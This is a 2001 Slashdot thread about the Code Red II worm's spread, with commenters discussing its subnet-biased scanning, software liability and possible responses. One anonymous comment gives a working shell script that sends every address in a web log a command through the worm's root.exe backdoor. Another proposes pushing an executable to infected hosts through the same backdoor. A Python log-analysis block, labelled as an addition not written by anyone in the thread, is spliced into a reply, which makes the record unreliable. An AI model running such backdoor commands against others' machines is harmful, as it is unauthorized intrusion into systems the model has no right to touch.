Code Red Back For More

Brian Stretch writes: "The Code Red II worm was unleashed early this morning and appears to be very different than the original and far more dangerous. CR2 infected servers only attack servers within their Class A address block and their Class B address block in particular: since 9:11am EST I've logged 148 CR2 attack attempts, 89 of which are from within my Class B subnet, suggesting that only servers within Class A networks that were deliberately seeded are being attacked. The 24.x.x.x range is one of the hardest hit, and as before, it's folks with cable modems and DSL connections that are providing the most victims." Several @home customers have written about slowed service today, but they're definitely not alone.
  • by Tackhead ( 54550 ) on Sunday August 05, 2001 @02:14AM (#2110450)
    > My microwave doesn't blue screen and cook my brain inside out.
    >
    > SO WHY THE HELL IS THE CORE FUNCTIONALITY OF MY PC allowed to distribute my personal information, crash during critical functionality, be susceptible to cracks and attacks that are easily preventable.

    For his track record of trading security for market share, I'm just as happy as any Slashdotter to see Bill Gates' nuts roasted over a fire until they pop.

    But the fact is, your PC - whether it runs CP/M, BeOS, FreeBSD, Linux, or Windows XP - is fundamentally different from embedded systems like your microwave and your car.

    Design flaws can exist - in medicines, in consumer products, in closed-source applications, and yes, in open-source applications.

    The reason the "core functionality" of your PC is "allowed" to distribute your private information is because it has to be able to do so if you're going to write emails to your friends.

    The reason it's "allowed" to crash is the same reason automobiles are "allowed" to crash -- sometimes it's a design flaw (Code Red IIS exploit, BIND exploit, Ford Pinto gas tank that exploded on rear impact), and sometimes it's operator error (SirCam worm, drunk driver).

    > I hope no one keeps personal, private, confidential and financial data on their PCs.

    The only truly secure machine is the one that's been unplugged, powered down, encased in concrete, wrapped up in a Faraday cage, and then dropped into the Marianas Trench. Ya gotta do what ya gotta do.

  • Of course... (Score:3, Insightful)

    by Jason W ( 65940 ) on Sunday August 05, 2001 @02:02AM (#2112471)
    If you get tired of seeing the requests, you could always shut the server down [securityfocus.com] (the requesting server of course, not yours :).

    Might not remove the worm, but at least gets the "admin" (ha) to pay some attention. Maybe make a request for YOU_HAVE_THE_CODE_RED_WORM_YOU_MORON.HTML right before you do it in case they check the logs :)

  • by IronChef ( 164482 ) on Sunday August 05, 2001 @04:17AM (#2112766)

    Unlike a car that explodes due to a design flaw, software that explodes due to a design flaw seems to be immune to the civil justice system.
  • by rawg ( 23000 ) on Sunday August 05, 2001 @03:10AM (#2113932) Homepage
    This will not work. How is your worm going to spread if you fix the system?
  • by sunhou ( 238795 ) on Sunday August 05, 2001 @11:21AM (#2114296)

    • One time out of eight, an entirely random IP address is generated
    • Four times out of eight, the lower octet of the IP address is randomized (192.168.1.X)
    • Three times out of eight, the lower two octets are randomized (192.168.X.Y)

    This is very interesting. I've recently been studying spatial population models of dispersal, e.g. when trees release seeds, should they go a short distance or a long distance? I.e. which will make them more likely to survive, and what combination of strategies will be evolutionarily stable?

    Short-distance dispersal is best on aggregated landscapes, where good habitat is likely to be nearby, although such strategies end up competing with themselves quite intensely. Long-distance dispersal is good on unclustered landscapes, where you're better off hoping to colonize a good site far away. But it turns out that mixed strategies seem to really kick butt; they exploit local rich patches of resources, but an occasional long-distance propagule allows them to colonize far-off patches once in a great while, and also reduces intraspecific competition somewhat.

    It would be really interesting seeing a few different Code Reds going with different proportions of near versus far dispersal, to see which one does best. It would tell us something about the aggregation of exploitable machines on the net. Although I suppose some people may object to such a study.

    As an AC pointed out in another reply, the really clever thing to do would be to have an adaptive strategy with a bit of randomness in it (i.e. the parameters in the strategy are changing too). That way, it would eventually "find" the strategy that works best, and in fact different subpopulations could converge to different locally optimum strategies.

  • by n3m6 ( 101260 ) <abdulla DOT faraz AT gmail DOT com> on Sunday August 05, 2001 @01:12AM (#2117108) Homepage Journal
    when will you people realize that code red is not just another worm that will fade away soon.. code red makes not only IIS webservers vulnerable.. but any service with an available exploit. i'm talking about the "code red algorithm" that it uses to scan the IPs and spread so fast. this is what makes code red so special.. and this is why we'll be having more of this soooner than you guys think.. it's DDoS days all over again..
  • The end is near... (Score:3, Insightful)

    by TrevorB ( 57780 ) on Sunday August 05, 2001 @12:07PM (#2118785) Homepage
    So let me get this straight... Every machine on the planet practically has a list of infected IP addresses broadcasted to them, with a new one arriving every minute or so (up to 663 XXX's here in the past two hours).

    So that means any loser with this list of infected IPs and some knowledge of Perl literally has a small army of computers at their command?

    I think we might be seeing some rather impressive DDoS attacks by this evening.

    Hmm.. 3 more XXX's in the time it took me to write this... frequency's increasing...
  • by whatnotever ( 116284 ) on Sunday August 05, 2001 @01:47AM (#2120428)
    "Code red algorithm"??? It's called a random IP scan. In this variation, it's called a scan of the local subnet with a random IP thrown in every now and then. There's nothing special about it.

    It's fast because that's how exponential growth works.
  • by cybrthng ( 22291 ) on Sunday August 05, 2001 @01:13AM (#2126423) Homepage Journal
    If there isn't one thing that can break the straw nothing will.

    I'm warned that smoking and drinking are bad for my health

    Medicines and drugs aren't legal unless they're fully tested and approved

    My car doesn't lock up and freeze

    My microwave doesn't blue screen and cook my brain inside out.

    SO WHY THE HELL IS THE CORE FUNCTIONALITY OF MY PC allowed to distribute my personal information, crash during critical functionality, be susceptible to cracks and attacks that are easily preventable.

    WHY do I have to pay extra for the functionality of NOT being susceptible to virii and net attacks?

    WHY doesn't microsoft NOTIFY me of the risks of using its OS?

    I hope no one's bank is trusting Microsoft, I hope anyone doing online transactions doesn't trust Microsoft. I hope no one keeps personal, private, confidential and financial data on their PCs.

    I hope no one running Windows is on the internet for that matter.

  • by cyberdonny ( 46462 ) on Sunday August 05, 2001 @03:03AM (#2126953)
    From the article [unixwiz.net]:

    In particular, the fact that it has "CodeRedII" inside means that it couldn't possibly be the original worm -- the name wasn't attached until after it was released.

    If this beast is truly wicked, it will scan assorted websites such as Slashdot, Wired, etc, and as soon as it will see talk about itself [slashdot.org] it will enter its active phase...

  • by Anonymous Coward on Sunday August 05, 2001 @11:04AM (#2127183)
    #!/bin/sh
    # Take every client address from the rotated Apache log (deduplicated) and send
    # it the root.exe rename request. As noted below, this assumes every entry in
    # that log is a Code Red hit.
    for address in $(awk '{print $1}' /var/log/apache/access.log.0 | sort -u)
    do
        wget -t 1 "http://$address/scripts/root.exe?/c+ren+root.exe+fire_your_admin.dat"
    done

    Not clean nor graceful and it only works if all your accesses come from red alerts, but it works and it's quite easy to adjust.
  • by nebby ( 11637 ) on Sunday August 05, 2001 @01:42AM (#2127731) Homepage
    I haven't done any analysis of the worm myself, but has anyone questioned the possibility that this new version is phase two of the original worm? Not the same code per se, but perhaps the old code red does something to tell the new code red to "come here" or something?

    The fact the old code red is turned off tells me that they might be linked to the same person/organization or something.. if I were some independent cracker I wouldn't bother getting rid of the old one since that's another thing which might break when I launch the new worm.
  • by weave ( 48069 ) on Sunday August 05, 2001 @06:33AM (#2129723) Journal
    With this high a number of scans it is now suicidal to install IIS while connected to the net. Chances are very good that your box will get compromised before you have a chance to apply the patch, even if you do so right away. And since people can easily set up a reverse hack to automatically do other nasty stuff to your box after THEY get probed, the risk is even higher.

    Solution, never ever have your box plugged into the network while installing a Windows server. Only plug it in after all patches, service packs, and hot fixes have been applied first.

  • Re:Source? (Score:2, Insightful)

    by Maditude ( 473526 ) on Sunday August 05, 2001 @02:12AM (#2136220)
    Here's a speedy one...

    #!/bin/sh
    # List every source address that requested default.ida, the URL the Code Red probe hits.
    grep default.ida /var/log/httpd-access.log | cut -f 1 -d ' ' | sort
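    Building on the one-liner above and on the 1/8, 4/8, 3/8 target mix sunhou quoted earlier, the following is an added example (not code from anyone in this thread) that parses Apache common-log lines, keeps the default.ida probes, and buckets each source by how close it is to the server's own address. The sample log lines, the server address 10.20.30.40 and the regex are constructed for the example; the point is that a log dominated by sources inside your own /16 is Code Red II's local scanning rather than the original worm's uniform random scan.

```python
import ipaddress
import re
from collections import Counter

# Apache common-log prefix: client address, two dash fields, [timestamp], "request".
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)"')

# Code Red II target mix quoted in the thread: 4/8 of probes stay inside the victim's
# /24, 3/8 inside its /16, 1/8 are fully random (approximate: a random pick can land
# nearby too). The original Code Red chose every target at random.
EXPECTED_CR2 = {"same /24": 0.5, "same /16": 0.375, "same /8": 0.0, "other": 0.125}

def bucket(src: str, me: str) -> str:
    """Most specific of /24, /16, /8 that src shares with our own address me."""
    for prefix, label in ((24, "same /24"), (16, "same /16"), (8, "same /8")):
        if ipaddress.ip_address(src) in ipaddress.ip_network(f"{me}/{prefix}", strict=False):
            return label
    return "other"

def probe_sources(lines, me: str) -> Counter:
    """Count default.ida probes per proximity bucket: the thread's grep|cut|sort
    one-liner, but grouped by network distance from our own address."""
    counts = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                   # malformed line, skip it
        src, request = m.groups()
        if "default.ida" in request:   # the probe both Code Red variants send
            counts[bucket(src, me)] += 1
    return counts

def locality_ratio(counts: Counter) -> float:
    """Share of probes from inside our /16: near 7/8 means CR2-style local
    scanning, near 0 means an unbiased random scanner such as the original."""
    total = sum(counts.values())
    return (counts["same /24"] + counts["same /16"]) / total if total else 0.0

# Constructed sample log, not real traffic: our server is 10.20.30.40, and the
# request line is cut down from the real ~300-byte default.ida payload.
SAMPLE_LOG = [
    '10.20.30.7 - - [05/Aug/2001:09:11:02 -0400] "GET /default.ida?XXX%u9090 HTTP/1.0" 404 303',
    '10.20.31.9 - - [05/Aug/2001:09:12:40 -0400] "GET /default.ida?XXX%u9090 HTTP/1.0" 404 303',
    '203.0.113.9 - - [05/Aug/2001:09:13:01 -0400] "GET /index.html HTTP/1.1" 200 1024',
    '10.20.30.200 - - [05/Aug/2001:09:14:17 -0400] "GET /default.ida?XXX%u9090 HTTP/1.0" 404 303',
    '10.77.1.2 - - [05/Aug/2001:09:15:55 -0400] "GET /default.ida?XXX%u9090 HTTP/1.0" 404 303',
    '203.0.113.5 - - [05/Aug/2001:09:16:23 -0400] "GET /default.ida?XXX%u9090 HTTP/1.0" 404 303',
    'garbage line that does not parse',
]
```

    Calling probe_sources(SAMPLE_LOG, "10.20.30.40") yields 2 same-/24, 1 same-/16, 1 same-/8 and 1 other source, and locality_ratio gives 0.6 for that sample; on a real log, compare the observed shares against EXPECTED_CR2 to tell locality-biased scanning from a uniform random scan.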
  • Why don't they... (Score:4, Insightful)

    by Greyfox ( 87712 ) on Sunday August 05, 2001 @01:13AM (#2138054) Homepage Journal
    Modify the code red code to apply the security patch to the vulnerable IIS servers and reboot the system? While this is potentially destructive to your system (I'm told -- MS security patches and all that) it would pretty well take care of this problem...
  • Free r00t for all! (Score:1, Insightful)

    by whatnotever ( 116284 ) on Sunday August 05, 2001 @01:15AM (#2150030)
    So here we basically have thousands of boxes with open backdoors, _broadcasting_ their presence to the world.

    And with people so nicely distributing their logs here in this forum, the collection of ips is easier than ever!

    Now that they have the backdoors, though, how hard would it be to patch them remotely? I'm thinking that if you put up a single exe on any old webserver, you could tell each infected host to just download and execute it. The only problems are writing the exe (not too hard), and figuring out how to get the host to download it, using the backdoor (probably trivial).
